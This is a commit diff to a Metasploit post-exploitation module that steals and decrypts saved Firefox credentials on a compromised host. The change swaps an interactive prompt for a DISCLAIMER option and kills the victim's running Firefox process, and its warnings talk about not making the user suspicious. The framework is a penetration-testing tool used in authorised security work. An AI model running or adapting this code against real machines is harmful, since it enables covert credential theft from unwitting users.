added advanced option

n3phos · n3phos · commit 1953473e1f59 · 2013-06-10T16:09:31.000-04:00
diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb
@@ -16,7 +16,6 @@
 
 class Metasploit3 < Msf::Post
 
-	include Rex::Ui::Interactive
 	include Msf::Post::File
 	include Msf::Post::Common
 	include Msf::Auxiliary::Report
@@ -53,6 +52,12 @@ def initialize(info={})
 				OptBool.new('DECRYPT', [false, 'Decrypts passwords without third party tools', false])
 			]
 		)
+
+		register_advanced_options(
+			[
+				OptBool.new('DISCLAIMER', [false, 'Acknowledge the warning', false])
+			]
+		)
 		#TODO
 		# - Collect cookies.
 	end
@@ -76,6 +81,13 @@ def run
 		end
 
 		if datastore['DECRYPT']
+			if not datastore['DISCLAIMER']
+							print_warning("Decrypting the keys causes the possible remote Firefox process to be,")
+							print_warning("killed. If the user is paying attention, this could make him/her suspicious.")
+							print_warning("In order to proceed, set the advanced DISCLAIMER option to true.")
+							return
+			end
+
 			omnija = nil
 			org_file = 'omni.ja'
 			new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".ja"
@@ -474,34 +486,22 @@ def trigger_decrypt(org_file, new_file)
 		if session.type == "meterpreter"
 			session.sys.process.each_process do |p|
 				if p['name'] =~ /firefox\.exe/
-					print_status("Found running Firefox process")
-					continue = warn_user()
-					if continue
-									if not session.sys.process.kill(p['pid'])
-										print_error("Could not kill Firefox process")
-										return false
-									end
-					else
-									file_rm(new_file)
-									return false
+					print_status("Found running Firefox process, attempting to kill.")
+					if not session.sys.process.kill(p['pid'])
+						print_error("Could not kill Firefox process")
+						return false
 					end
 				end
 			end
 
 		elsif session.type != "meterpreter"
 			p = cmd_exec("ps", "cax | grep firefox")
 			if p =~ /firefox/
-				print_status("Found running Firefox process")
-				continue = warn_user()
-				if continue
-								term = cmd_exec("killall", "firefox && echo true")
-								if not term =~ /true/
-									print_error("Could not kill Firefox process")
-									return false
-								end
-				else
-								file_rm(new_file)
-								return false
+				print_status("Found running Firefox process, attempting to kill.")
+				term = cmd_exec("killall", "firefox && echo true")
+				if not term =~ /true/
+					print_error("Could not kill Firefox process")
+					return false
 				end
 			end
 		end
@@ -535,13 +535,6 @@ def trigger_decrypt(org_file, new_file)
 
 	end
 
-	def warn_user()
-					print_warning("In order to proceed, the running Firefox process must be killed.")
-					print_warning("Keep in mind that this leaves visual evidence on the victim machine and")
-					print_warning("if the user is paying attention, this could make him/her suspicious.")
-					return prompt_yesno("Do you want to continue?")
-	end
-
 	def download_loot(paths)
 		loot = ""
 		paths.each do |path|
